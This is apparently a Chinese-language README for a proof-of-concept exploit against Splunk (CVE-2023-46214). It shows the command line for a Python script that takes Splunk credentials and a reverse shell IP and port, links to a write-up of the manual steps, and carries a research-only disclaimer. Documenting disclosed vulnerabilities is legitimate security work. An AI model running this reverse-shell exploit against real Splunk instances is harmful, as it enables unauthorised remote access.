针对 CVE-2023-46214、SVD-2023-1104 的利用概念验证

Splunk 实例 URL、用户名、密码、反向 Shell IP 和端口均需作为命令行参数提供。例如:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
我撰写了一篇博客文章,详细介绍了发现此漏洞所采用的方法。如果你在运行脚本时遇到任何问题,这篇博客可能会有所帮助,因为它详细描述了利用的手动步骤。
本仓库中提供的概念验证(PoC)脚本仅用于教育和研究目的。其用途是展示特定漏洞并帮助理解相关的安全风险。
严禁将此脚本用于任何未经授权的活动,包括但不限于未经授权的系统访问、未经授权的测试或其他形式的滥用。
本仓库的创建者和贡献者不对因使用此脚本而导致的任何不当使用或任何损害承担责任。使用此脚本即表示你同意以负责任的方式使用它,并自行承担风险。